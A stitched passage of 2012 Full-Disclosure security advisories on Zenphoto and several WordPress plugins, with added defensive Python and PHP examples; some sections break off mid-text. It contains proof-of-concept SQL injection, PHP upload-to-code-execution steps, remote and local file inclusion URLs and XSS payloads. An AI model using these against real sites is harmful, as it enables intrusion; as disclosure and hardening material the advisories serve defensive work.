    } else {
        return sanitize($_SERVER['REMOTE_ADDR'], 0);
[ source code end ]

Function "sanitize()" does the following to the input data:
 1. strips slashes if magic_quotes_gpc=on
 2. strips null bytes
 3. strips HTML tags
 
So "sanitize()" prevents null-byte tricks and most XSS payloads, but it
neither escapes nor removes single and double quotes, so SQL injection is
still possible. In fact this function makes SQL injection more likely, because
it reverts the effect of "magic_quotes_gpc". As a result of this insufficient
input sanitization, an attacker can use the HTTP header "X_FORWARDED_FOR" for
SQL injection.
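An added example (Python, not Zenphoto code) of what getUserIP() and the logging query should do: only a validated IP literal is derived from X-Forwarded-For, and only when the header was set by one of our own proxies; the INSERT then binds the value as a parameter, so even an unexpected value cannot change the statement. The trusted proxy ranges and the in-memory table are assumptions.

```python
"""Added example, not Zenphoto code: derive the client address from
X-Forwarded-For safely and log it with a bound parameter."""
import ipaddress
import sqlite3
import time
from typing import Optional

TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8"),
                   ipaddress.ip_network("127.0.0.0/8")]      # assumed


def _trusted(ip) -> bool:
    return any(ip in net for net in TRUSTED_PROXIES)


def client_ip(remote_addr: str, xff: Optional[str]) -> str:
    """Nearest untrusted hop, as a canonical IP string.
    REMOTE_ADDR is set by the web server from the TCP peer and is always a
    valid literal; X-Forwarded-For is attacker-writable and is consulted only
    when the peer is one of our proxies."""
    peer = ipaddress.ip_address(remote_addr)
    if not xff or not _trusted(peer):
        return str(peer)
    for hop in reversed([h.strip() for h in xff.split(",")]):
        try:
            ip = ipaddress.ip_address(hop)
        except ValueError:
            return str(peer)        # e.g. war"axe: not an address, fall back to the peer
        if not _trusted(ip):
            return str(ip)
    return str(peer)                # every hop was one of our proxies


def open_store() -> sqlite3.Connection:
    """In-memory stand-in for the plugin_storage table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE plugin_storage (type TEXT, aux TEXT, data TEXT)")
    return conn


def record_failed_access(conn, remote_addr: str, xff: Optional[str]) -> int:
    """Log the attempt with bound parameters and return how many failures this
    address now has (the plugin's db_count step)."""
    ip = client_ip(remote_addr, xff)
    conn.execute("INSERT INTO plugin_storage (type, aux, data) VALUES (?, ?, ?)",
                 ("failed_access", str(int(time.time())), ip))
    (count,) = conn.execute(
        "SELECT COUNT(*) FROM plugin_storage WHERE type = ? AND data = ?",
        ("failed_access", ip)).fetchone()
    return count


def simulate(remote_addr: str, xff: Optional[str], attempts: int = 2) -> int:
    """Fresh store, `attempts` failed logins from the same source; returns the count."""
    conn = open_store()
    count = 0
    for _ in range(attempts):
        count = record_failed_access(conn, remote_addr, xff)
    return count
```

The validation and the parameter binding are independent defences: the first keeps the log meaningful (a blocker keyed on attacker-chosen strings can be bypassed or used to lock out others), the second is what actually removes the injection.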

Test:

Let's use Firefox browser with Tamper Data Add-on.

 1. Open admin page:
 
 http://localhost/zenphoto1433/zp-core/admin.php
 
 2. Activate Tamper data (Start Tamper)
 3. Try to log in with bogus credentials, Tamper Data triggers
 4. "Tamper with request?" -> "Tamper"
 5. "Add element" -> X_FORWARDED_FOR=war"axe
 6. Click "OK" and tampered request will go to the server 

As result we will see blank page (OK 200 response code, content length 0).
But let's look at "debug.log" in "zp-data":

Backtrace: USER ERROR: MySql Error: ( INSERT INTO `[prefix]plugin_storage`
(`type`, `aux`,`data`) VALUES ("failed_access", "1349792737","war"axe") )
failed. MySql returned the error You have an error in your SQL syntax; 
check the manual that corresponds to your MySQL server version for the right
syntax to use near 'axe")'


###
2. SQL Injection in "zp-core/zp-extensions/search_statistics.php"
###

Reason: insufficient sanitization of user-supplied data
Attack vector: user-supplied HTTP header "X_FORWARDED_FOR"
Preconditions:
 1. plugin "search_statistics" activated (disabled by default)


Php script "zp-core/zp-extensions/search_statistics.php" line 101:
[ source code start ]---

[Full-disclosure] [waraxe-2012-SA#095] - Multiple Vulnerabilities in Wordpress FoxyPress Plugin

2012-10-30 Thread Janek Vind

[waraxe-2012-SA#095] - Multiple Vulnerabilities in Wordpress FoxyPress Plugin
===

Author: Janek Vind "waraxe"
Date: 30. October 2012
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-95.html


Description of vulnerable target:
~~~

FoxyPress is a FREE shopping cart and product management tool that integrates
with FoxyCart's e-commerce solution to help you get your store up and running
quickly and efficiently. 

http://wordpress.org/extend/plugins/foxypress/

Affected version: 0.4.2.5



###
1. Arbitrary File Upload Vulnerability in "documenthandler.php"
###

Reasons: Missing security checks in file upload functionality
Attack vectors: Uploaded file
Preconditions: Logged in as admin with FoxyPress product editing privileges
 

Php script "documenthandler.php" line 14:
[ source code start ]--
if (!empty($_FILES)) {
...
 $targetpath = ABSPATH . INVENTORY_DOWNLOADABLE_LOCAL_DIR;
...
 $newfilename = foxypress_GenerateNewFileName($fileExtension, $inventory_id,
   $targetpath, $prefix);    
 $targetpath = $targetpath . $newfilename;     
 if(move_uploaded_file($_FILES['Filedata']['tmp_name'], $targetpath))
[ source code end ]

As we can see above, there are no security checks on the uploaded file. As a
result, an attacker is able to upload files with an arbitrary extension to the
remote system. For PHP files this vulnerability leads to RCE (Remote Code
Execution).

Test:

1. Open product editing webpage:

http://localhost/wp342/wp-admin/post.php?post=43&action=edit

2. Look for "Digital Downloads". Insert some number to the input box below:
"Max Downloads allowed (if you need to override the main setting)".

3. There must be "Browse Files" button (Flash-based). Choose the php file, you
want to upload.

We can observe AJAX in action and as result download link appears:

http://localhost/wp342/wp-content/inventory_downloadables/my_download_jw82ku0jz9_43.php

Opening that download link will execute previously uploaded php file.
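An added example, not FoxyPress code, of the checks that documenthandler.php omits before move_uploaded_file(): every suffix of the client-supplied name is matched against an allowlist, the first bytes are checked against the declared type, the size is capped, and the stored name is chosen by the server. The allowlist and the magic-byte table are assumptions for a digital-downloads feature.

```python
"""Added example, not FoxyPress code: validating an upload before it is moved
into a web-reachable directory."""
import os
import secrets

ALLOWED_EXT = {"pdf", "zip"}                          # assumed allowlist
MAGIC = {"pdf": b"%PDF-", "zip": b"PK\x03\x04"}       # leading bytes per type
MAX_BYTES = 50 * 1024 * 1024


class UploadRejected(Exception):
    pass


def check_upload(client_name: str, data: bytes, inventory_id: int) -> str:
    """Validate an upload and return the server-chosen file name to store it
    under; raises UploadRejected otherwise."""
    if not isinstance(inventory_id, int) or inventory_id <= 0:
        raise UploadRejected("bad inventory id")
    if len(data) > MAX_BYTES:
        raise UploadRejected("too large")
    base = os.path.basename(client_name.replace("\\", "/"))   # drop any path
    parts = base.lower().split(".")
    if len(parts) < 2 or "" in parts:                          # also rejects '.htaccess'
        raise UploadRejected(f"unacceptable name {base!r}")
    # Every suffix must be allowed, not just the last one: with Apache's
    # AddHandler, 'notes.php.pdf' is still handed to the PHP interpreter.
    for ext in parts[1:]:
        if ext not in ALLOWED_EXT:
            raise UploadRejected(f"extension .{ext} not allowed")
    ext = parts[-1]
    if not data.startswith(MAGIC[ext]):
        raise UploadRejected("content does not match extension")
    # The stored name comes from the server: id, random token, allowlisted extension.
    return f"download_{inventory_id}_{secrets.token_hex(8)}.{ext}"


def accepted(client_name: str, data: bytes, inventory_id: int = 43) -> bool:
    """True if check_upload() accepts the file."""
    try:
        check_upload(client_name, data, inventory_id)
    except UploadRejected:
        return False
    return True
```

Even with these checks, downloadable files belong outside the document root (or in a directory where script execution is disabled) and should be served through a handler, so that a mistake in the validation never becomes code execution.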



###
2. SQL Injection Vulnerability in "documenthandler.php"
###

Reasons: Insufficient sanitization of user-supplied data
Attack vectors: User-supplied POST parameter "prefix"
Preconditions: Logged in as admin with FoxyPress product editing privileges
 

Php script "documenthandler.php" line 14:
[ source code start ]--
if (!empty($_FILES)) {
    $inventory_id = intval( $_POST['inventory_id'] );
    $downloadabletable = $_POST['prefix'];
...
 $query = "INSERT INTO " . $downloadabletable . " SET inventory_id='" 
  . $inventory_id . "', filename='" . mysql_escape_string($newfilename)
  . "',  maxdownloads= '" . mysql_escape_string($downloadablemaxdownloads)
  . "', status = 1";
 $wpdb->query($query);
[ source code end ]

We can see that the user-supplied POST parameter "prefix" is used in the
subsequent SQL "INSERT INTO" query as the table name, without any sanitization.
The attacker therefore chooses which table in the current database the row is
inserted into; since a table name cannot be passed as a bound parameter, the
fix is to validate it against an allowlist of known table names.


Test (parameter "security" must be valid):
-[ test code start ]---
HTML form (method="post", enctype="multipart/form-data") submitting the file
field "Filedata" and the POST parameter "prefix" (set to "waraxe" here, as the
result below shows) to:

http://localhost/wp342/wp-admin/admin-ajax.php?action=foxypress_download&security=844b64ce45
--[ test code end ]


Result (Wordpress must be set to show SQL errors):

WordPress database error: [Table 'wp342.waraxe' doesn't exist]
INSERT INTO waraxe SET inventory_id='0', 
filename='downloadable_qga73aojs8_0.php', maxdownloads= '1', status = 1



###
3. SQL Injection Vulnerability in "foxypress-manage-emails.php"
###

Reasons: Insufficient sanitization of user-supplied data
Attack vectors: User-supplied GET parameter "id"
Preconditions: Logged in as admin with FoxyPress management privileges
 

Php script &quo

[Full-disclosure] [waraxe-2012-SA#094] - Multiple Vulnerabilities in Wordpress GRAND Flash Album Gallery Plugin

2012-10-26 Thread Janek Vind

[waraxe-2012-SA#094] - Multiple Vulnerabilities in Wordpress GRAND Flash Album 
Gallery Plugin
=

Author: Janek Vind "waraxe"
Date: 24. October 2012
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-94.html


Description of vulnerable target:
~~~

Try GRAND Flash Album Gallery - powerful flash & jQuery media content plugin.
It provides a comprehensive interface for handling image galleries, audio and
video. You can edit your media content the way you want: upload images, import
music and video, create photo gallery, music playlists, group pictures in
slideshow and add descriptions for each image, mp3 or video - GRAND FlAGallery
is the smart choice when showing the best of your product or describing in brief
any event.

http://codeasily.com/wordpress-plugins/flash-album-gallery/flag
http://wordpress.org/extend/plugins/flash-album-gallery/

Affected versions: 1.9.0, 2.0.0


###
1. Arbitrary File Overwrite Vulnerability in "admin/skin_options.php"
###

Reasons:
 1. Insecure use of "parse_str()"
 2. Uninitialized variable "$mainXML"
Attack vector: User-supplied POST parameters "settingsXML" and  "mainXML"
Precondition: Logged in as admin with "FlAG Change skin" privileges
 
 
Php script "admin/skin_options.php" line:
[ source code start ]--
$settingsXML =  $settings.'/settings.xml';

$flashPost = file_get_contents("php://input");
// parse properties_skin
parse_str($flashPost);

if(isset($properties_skin) && !empty($properties_skin)) {
    $fp = fopen($settingsXML, "r");
    if(!$fp) {
        exit( "2");//Failure - not read;
    }
    while(!feof($fp)) {
        $mainXML .= fgetc($fp);
    }
    $fp = fopen($settingsXML, "w");
    if(!$fp)
        exit("0");//Failure
    $newProperties = preg_replace("|.*?|si", 
$properties_skin, $mainXML);
    fwrite($fp, $newProperties);
    fclose($fp);
    echo "1";//Save
[ source code end ]

As we can observe, the PHP function "parse_str()" is called with the raw POST body as its
only argument. This is a very dangerous coding style, because every key in the request
body becomes a variable in the current scope and can overwrite any variable set before
this line. The attacker can overwrite "$settingsXML", which is the path of the file that
is opened for reading and then for writing in the next steps, so the attacker can choose
any file on the remote system to be overwritten. The next interesting problem is that
"$mainXML" is never initialized: the attacker can seed it through the same "parse_str()"
call, the contents of the opened file are appended to it with ".=", and the result is
written back, so arbitrary data is prepended to an arbitrary file on the remote system.
The attacker can use this to inject PHP code into existing PHP files, which ultimately
leads to RCE (Remote Code Execution).

Test (file "wp-content/plugins/hello.php" must exist and be writable):
-[ test code start ]---

<form action="http://localhost/wp342/wp-content/plugins/flash-album-gallery/admin/skin_options.php"
 method="post">


--[ test code end ]

The injected PHP code can then be executed by the following request:

http://localhost/wp342/wp-content/plugins/hello.php


###
2. Arbitrary File Overwrite Vulnerability in "lib/constructor.php"
###

Reasons:
 1. Insecure use of "parse_str()"
 2. Uninitialized variable "$mainXML"
Attack vector: User-supplied POST parameters "skin_name" and  "mainXML"
Preconditions:
 1. Logged in as admin with "FlAG Change skin" privileges
 2. "magic_quotes_gpc=off" for successful null-byte attacks
 3. PHP must be < 5.3.4 for successful null-byte attacks


Php script "lib/constructor.php" line 25:
[ source code start ]--
$flashPost = file_get_contents("php://input");
// parse properties_skin
parse_str($flashPost);
$settingsXML =  str_replace("\\","/", dirname(dirname(dirname(__FILE__))).
 '/flagallery-skins/'.$skin_name.'/settings/settings.xml');

if(isset($properties_skin) && !empty($properties_skin)) {
    $fp
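
Added example covering sections 1 and 2 above; it is not FlAGallery code. It reproduces
the two "parse_str()" problems (the clobbered "$settingsXML" path and the client-seeded
"$mainXML") in one function and puts a hardened handler next to it: the body is parsed
into an array, "skin_name" is validated, the target path is anchored under the skins
directory and confirmed with realpath(), and "$mainXML" is read from the file only. The
temporary directory layout, the skin name "default", the victim file "hello.php", the
payload and the "<properties>" tag name are all constructed for the demo, and the helper
names (vulnerable_skin_save, hardened_skin_save) are mine. Because one-argument
parse_str() no longer exists in PHP 8, the vulnerable function emulates it with
parse_str() into an array followed by extract(), which has the same effect on the scope.

```php
<?php
declare(strict_types=1);
// Added example, not FlAGallery code. Shows the parse_str() variable clobbering from
// sections 1 and 2 and a hardened handler. Directory layout, skin name and payload are
// constructed for the demo.

/**
 * The advisory's pattern. One-argument parse_str($body) (removed in PHP 8) behaved like
 * parse_str($body, $p); extract($p): every key in the body becomes a local variable, so
 * $settingsXML is clobbered and the never-initialised $mainXML is seeded by the client.
 * Returns [path that would be truncated and rewritten, bytes that would lead the file].
 */
function vulnerable_skin_save(string $flashPost, string $settingsDir): ?array
{
    $settingsXML = $settingsDir . '/settings.xml';
    parse_str($flashPost, $p);
    extract($p);                                  // stands in for one-argument parse_str()
    if (!isset($properties_skin) || $properties_skin === '') {
        return null;
    }
    $mainXML = $mainXML ?? '';                    // the original never initialises it
    $mainXML .= '<skin>...contents of the opened file...</skin>';  // stands in for the fgetc() loop
    return [$settingsXML, $mainXML];
}

/**
 * Hardened: the body is parsed into an array, the skin name is validated, the target path
 * is anchored under the skins directory and confirmed with realpath(), and $mainXML is
 * read from that file only. The <properties> tag name is assumed for the demo.
 */
function hardened_skin_save(string $flashPost, string $skinsBase): string
{
    parse_str($flashPost, $params);               // never into the symbol table
    $skin = $params['skin_name'] ?? '';
    $properties = $params['properties_skin'] ?? '';
    if (!is_string($properties) || $properties === '') {
        throw new InvalidArgumentException('nothing to save');
    }
    if (!is_string($skin) || !preg_match('/\A[A-Za-z0-9_-]+\z/', $skin)) {  // no "..", "/", "\\", NUL
        throw new InvalidArgumentException('invalid skin name');
    }
    $base = realpath($skinsBase);
    $target = realpath($skinsBase . '/' . $skin . '/settings/settings.xml');
    if ($base === false || $target === false
        || strncmp($target, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('settings file missing or outside the skins directory');
    }
    $mainXML = (string) file_get_contents($target);
    $new = preg_replace_callback('|<properties>.*?</properties>|si', fn() => $properties, $mainXML);
    file_put_contents($target, $new, LOCK_EX);
    return $target;
}

// --- demo on a constructed tree ---
$base = sys_get_temp_dir() . '/flag_demo_' . bin2hex(random_bytes(4));
mkdir("$base/skins/default/settings", 0700, true);
file_put_contents("$base/skins/default/settings/settings.xml", '<skin><properties>old</properties></skin>');
file_put_contents("$base/hello.php", "<?php\n// victim file\n");

$attack = http_build_query([
    'settingsXML'     => "$base/hello.php",           // clobbers the path
    'mainXML'         => '<?php echo "injected"; ?>', // seeds the uninitialised variable
    'properties_skin' => 'x',
]);
[$path, $bytes] = vulnerable_skin_save($attack, "$base/skins/default/settings");
echo "vulnerable would rewrite: $path\n";
echo "file would begin with:    " . substr($bytes, 0, 25) . "\n";

foreach (['default', '../../hello.php', "default\0"] as $skin) {
    $body = http_build_query(['skin_name' => $skin, 'properties_skin' => '<properties>new</properties>']);
    try {
        echo "hardened wrote: " . hardened_skin_save($body, "$base/skins") . "\n";
    } catch (Exception $e) {
        echo "hardened refused " . json_encode($skin) . ": " . $e->getMessage() . "\n";
    }
}
echo "hello.php untouched: " . (file_get_contents("$base/hello.php") === "<?php\n// victim file\n" ? 'yes' : 'no') . "\n";

unlink("$base/skins/default/settings/settings.xml");
unlink("$base/hello.php");
foreach (["$base/skins/default/settings", "$base/skins/default", "$base/skins", $base] as $d) {
    rmdir($d);
}
```

The character class on "skin_name" is what closes section 2's null-byte and traversal
cases before any filesystem call is made; the realpath() comparison is the second line of
defence in case the skins directory itself contains a symlink. Keeping the request data in
$params instead of the symbol table is what closes section 1.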

[Full-disclosure] [waraxe-2012-SA#093] - Multiple Vulnerabilities in Wordpress Social Discussions Plugin

2012-10-17 Thread Janek Vind

[waraxe-2012-SA#093] - Multiple Vulnerabilities in Wordpress Social Discussions 
Plugin
==

Author: Janek Vind "waraxe"
Date: 17. October 2012
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-93.html


Description of vulnerable target:
~~~

Enables Social Sharing of your blog posts to 30+ Social Networks. Plugin also
enables you to Automatically Publish or Self Publish your Blog Posts to 25+ 
Networks.

http://wordpress.org/extend/plugins/social-discussions/

Affected version: 6.1.1

###
1. Remote File Inclusion in "social-discussions-networkpub_ajax.php"
###

Reasons: Uninitialized variable "$HTTP_ENV_VARS"
Attack vectors: User-supplied parameter "HTTP_ENV_VARS"
Preconditions:
 1. register_globals=on
 2. register_long_arrays=off
 3. allow_url_include=on for RFI if PHP >= 5.2.0
 4. PHP must be < 5.3.4 for LFI null-byte attacks
 5. magic_quotes_gpc=off for LFI null-byte attacks
 
 
Php script "social-discussions-networkpub_ajax.php" line 2:
[ source code start ]--
if (!function_exists('add_action')){
  @include_once($GLOBALS['HTTP_ENV_VARS']['DOCUMENT_ROOT'] . "/wp-config.php");
[ source code end ]

We can see that the script expects the old-style array "HTTP_ENV_VARS" to be initialized
and to contain a "DOCUMENT_ROOT" entry. However, when the PHP directive
"register_long_arrays=off" is set, "HTTP_ENV_VARS" is not initialized at all, and if at
the same time "register_globals=on", a request parameter can fill that array with any
value. The include path is then attacker-controlled, which leads to RFI (Remote File
Inclusion), or to LFI with a null byte under the preconditions listed above.


Tests:

http://localhost/wp342/wp-content/plugins/social-discussions/social-discussions-networkpub_ajax.php?HTTP_ENV_VARS[DOCUMENT_ROOT]=http://php.net/?

http://localhost/wp342/wp-content/plugins/social-discussions/social-discussions-networkpub_ajax.php?HTTP_ENV_VARS[DOCUMENT_ROOT]=/proc/self/environ%00z


###
2. Full Path Disclosure in multiple scripts
###

Reasons: Direct request to php script triggers pathname leak in error message
Preconditions: PHP directive display_errors=on
Result: Information Exposure Through an Error Message

Tests:

http://localhost/wp342/wp-content/plugins/social-discussions/social-discussions-networkpub.php

Fatal error: Call to undefined function __() in
C:\apache_www\wp342\wp-content\plugins\social-discussions\social-discussions-networkpub.php
 on line 2

http://localhost/wp342/wp-content/plugins/social-discussions/social-discussions.php

Fatal error: Call to undefined function __() in
C:\apache_www\wp342\wp-content\plugins\social-discussions\social-discussions-networkpub.php
 on line 2

http://localhost/wp342/wp-content/plugins/social-discussions/social_discussions_service_names.php

Fatal error: Call to undefined function __() in
C:\apache_www\wp342\wp-content\plugins\social-discussions\social_discussions_service_names.php
 on line 3



Contact:
~~~

come2war...@yahoo.com
Janek Vind "waraxe"

Waraxe forum:  http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
Random project: http://albumnow.com/
-- [ EOF ] 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
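
Added example for the advisory above; it is not part of the advisory or of the plugin. It
is a small heuristic scanner for a plugin directory that reports the two patterns from
sections 1 and 2: an include/require whose path is built from request data or from one of
the old "HTTP_*_VARS" arrays, and PHP files that carry no direct-access guard at all
(neither a defined('ABSPATH') check nor a function_exists('add_action') check that exits).
Regexes stand in for a real PHP parser, so treat the output as candidates to review. Only
the first sample file is quoted from the advisory; the other two file contents, the
temporary directory and the function names (scan_php_source, scan_plugin_dir) are
constructed for the demo.

```php
<?php
declare(strict_types=1);
// Added example, not part of the advisory or the plugin. Heuristic scan of a plugin tree for
// files that are dangerous when requested directly: include/require paths built from
// request or long-array data (the RFI in section 1) and files with no direct-access guard
// at all (the full path disclosure in section 2). Regexes are a heuristic, not a parser.
// Sample files are constructed here; only the first one is quoted from the advisory.

const REQUEST_SOURCES = '(?:\$_(?:GET|POST|REQUEST|COOKIE)'
    . '|\$GLOBALS\s*\[\s*[\'"]HTTP_\w+_VARS[\'"]\s*\]|\$HTTP_\w+_VARS)';

/** Findings for one PHP source text (empty array when nothing was flagged). */
function scan_php_source(string $src): array
{
    $findings = [];
    $inc = '/\b(?:include|require)(?:_once)?\s*\(?[^;]*' . REQUEST_SOURCES . '[^;]*;/s';
    if (preg_match_all($inc, $src, $m)) {
        foreach ($m[0] as $stmt) {
            $findings[] = 'include path built from request data: ' . preg_replace('/\s+/', ' ', trim($stmt));
        }
    }
    // A guard is either defined('ABSPATH') or a function_exists('add_action') check that exits.
    // Bootstrapping wp-config.php on that branch, as in the advisory, is not a guard.
    $guarded = preg_match('/defined\s*\(\s*[\'"]ABSPATH[\'"]\s*\)/', $src) === 1
        || preg_match('/function_exists\s*\(\s*[\'"]add_action[\'"]\s*\)[^{;]*\{?\s*(?:exit|die)\b/s', $src) === 1;
    if (!$guarded) {
        $findings[] = 'no direct-access guard: a direct request reaches WordPress-only calls '
            . '(full path disclosure when display_errors=on)';
    }
    return $findings;
}

/** Walks $dir and returns [relative path => findings] for every flagged .php file. */
function scan_plugin_dir(string $dir): array
{
    $dir = rtrim($dir, '/');
    $report = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS));
    foreach ($it as $file) {
        if ($file->getExtension() !== 'php') {
            continue;
        }
        $f = scan_php_source((string) file_get_contents($file->getPathname()));
        if ($f !== []) {
            $report[substr($file->getPathname(), strlen($dir) + 1)] = $f;
        }
    }
    ksort($report);
    return $report;
}

// --- demo on a constructed plugin directory ---
$dir = sys_get_temp_dir() . '/sd_scan_' . bin2hex(random_bytes(4));
mkdir($dir, 0700, true);
$samples = [
    // quoted from the advisory (line 2 of the plugin file)
    'social-discussions-networkpub_ajax.php' => "<?php\nif (!function_exists('add_action')){\n"
        . "  @include_once(\$GLOBALS['HTTP_ENV_VARS']['DOCUMENT_ROOT'] . \"/wp-config.php\");\n}\n",
    // constructed: calls a WordPress function with no guard, like the files in section 2
    'social-discussions.php' => "<?php\necho __('Share this post');\n",
    // constructed: the guard WordPress plugin files are expected to carry
    'guarded.php' => "<?php\nif (!defined('ABSPATH')) { exit; }\necho __('Share this post');\n",
];
foreach ($samples as $name => $src) {
    file_put_contents("$dir/$name", $src);
}
foreach (scan_plugin_dir($dir) as $file => $findings) {
    echo $file, ":\n";
    foreach ($findings as $f) {
        echo "  - ", $f, "\n";
    }
}
foreach (array_keys($samples) as $name) {
    unlink("$dir/$name");
}
rmdir($dir);
```

Point scan_plugin_dir() at a real wp-content/plugins/<name> directory to use it outside the
demo. The first sample is flagged twice: once for the include built from the long array and
once because its function_exists() branch loads wp-config.php instead of exiting, which is
exactly why a direct request to it is useful to an attacker.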


[Full-disclosure] [waraxe-2012-SA#092] - Multiple Vulnerabilities in Wordpress Slideshow Plugin

2012-10-17 Thread Janek Vind

[waraxe-2012-SA#092] - Multiple Vulnerabilities in Wordpress Slideshow Plugin
===

Author: Janek Vind "waraxe"
Date: 17. October 2012
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-92.html


Description of vulnerable target:
~~~

Slideshow provides an easy way to integrate a slideshow for any WordPress
installation.

Any image can be loaded into the slideshow by picking it from the WordPress
media page, even images you've already uploaded can be inserted into your
slideshow right away!

http://wordpress.org/extend/plugins/slideshow-jquery-image-gallery/

Affected version: 2.1.12

###
1. Reflected XSS in "views/SlideshowPlugin/slideshow.php"
###

Reasons: 
 1. Uninitialized variables "$randomId", "$slides" and "$settings"
 2. Improper encoding or escaping of output
Attack vectors: User-supplied parameters "randomId", "slides" and "settings"
Preconditions: PHP directive register_globals=on


Tests:

http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=";>alert(123);
http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=alert(123);
http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?settings=


###
2. Reflected XSS in "views/SlideshowPluginPostType/settings.php"
###

Reasons: 
 1. Uninitialized variables "$settings" and "$inputFields"
 2. Improper encoding or escaping of output
Attack vectors: User-supplied parameters "settings" and "inputFields"
Preconditions: PHP directive register_globals=on


Tests:

http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=alert(123);
http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[0][]&inputFields[0]=alert(123);


###
3. Reflected XSS in "views/SlideshowPluginPostType/style-settings.php"
###

Reasons: 
 1. Uninitialized variables "$settings" and "$inputFields"
 2. Improper encoding or escaping of output
Attack vectors: User-supplied parameters "settings" and "inputFields"
Preconditions: PHP directive register_globals=on


Tests:

http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0][3]=alert(123);
http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=alert(123);


###
4. Full Path Disclosure in multiple scripts
###

Reasons: Direct request to php script triggers pathname leak in error message
Preconditions: PHP directive display_errors=on
Result: Information Exposure Through an Error Message

Tests:

http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/slideshow.php

Fatal error: Call to undefined function add_action() in
C:\apache_www\wp342\wp-content\plugins\slideshow-jquery-image-gallery\slideshow.php
 on line 34

http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/classes/SlideshowPluginWidget.php

Fatal error: Class 'WP_Widget' not found in
C:\apache_www\wp342\wp-content\plugins\slideshow-jquery-image-gallery\classes\SlideshowPluginWidget.php
 on line 8

http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php

Fatal error: Class 'SlideshowPluginMain' not found in
C:\apache_www\wp342\wp-content\plugins\slideshow-jquery-image-gallery\views\SlideshowPlugin\slideshow.php
 on line 111

http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/information.php

Fatal error: Call to undefined function _e() in
C:\apache_www\wp342\wp-content\plugins\slideshow-jquery-image-gallery\views\SlideshowPluginPostType\information.php
 on line 1

http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/Slides